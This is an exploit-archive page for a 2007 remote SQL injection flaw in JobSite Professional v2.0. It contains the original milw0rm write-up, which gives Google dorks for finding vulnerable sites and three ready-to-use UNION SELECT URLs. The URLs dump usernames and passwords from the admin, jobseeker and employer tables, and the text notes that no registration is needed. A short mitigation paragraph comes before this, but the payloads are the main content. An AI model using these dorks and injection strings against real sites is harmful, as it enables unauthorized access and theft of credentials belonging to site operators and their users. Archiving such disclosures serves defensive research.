header-logo
Suggest Exploit
vendor:
JobSite Professional
by:
ZynbER
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: JobSite Professional
Affected Version From: JobSite Professional v2.0
Affected Version To: JobSite Professional v2.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

JobSite Professional v2.0 Remote SQL Injection Vulnerability

Vulnerability in (File.php?id=) allows remote attackers to execute arbitrary SQL commands via the id parameter, which can lead to unauthorized access and disclosure of sensitive information.

Mitigation:

The vendor should sanitize user input and use parameterized queries to prevent SQL injection attacks. Regularly updating the software to the latest version is also recommended.
Source

Exploit-DB raw data:

#########################################################################
JobSite Professional v2.0    Remote SQL Injection Vulnerability
#########################################################################


## AUTHOR : ZynbER
## HOME : NoWhere


## Script WebSite:
http://www.jobsiteprofessional.com

## Dork english version : inurl:index.php?page=en_jobseekers
## Dork french version  : inurl:index.php?page=fr_Candidats


## EXPLOITS :

Vulnerability in (File.php?id=)



http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_admin_users/*

http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_jobseekers/*

http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_employers/*



## Note
No registration is needed!!



## GREETZ  :  MEKNES - SIDIBABA - MARROK - SKIZO - BouKa-BouKa

#########################################################################
JobSite Professional v2.0    Remote SQL Injection Vulnerability
#########################################################################

# milw0rm.com [2007-10-28]

Navigation

Suggest Exploit

Services By CQR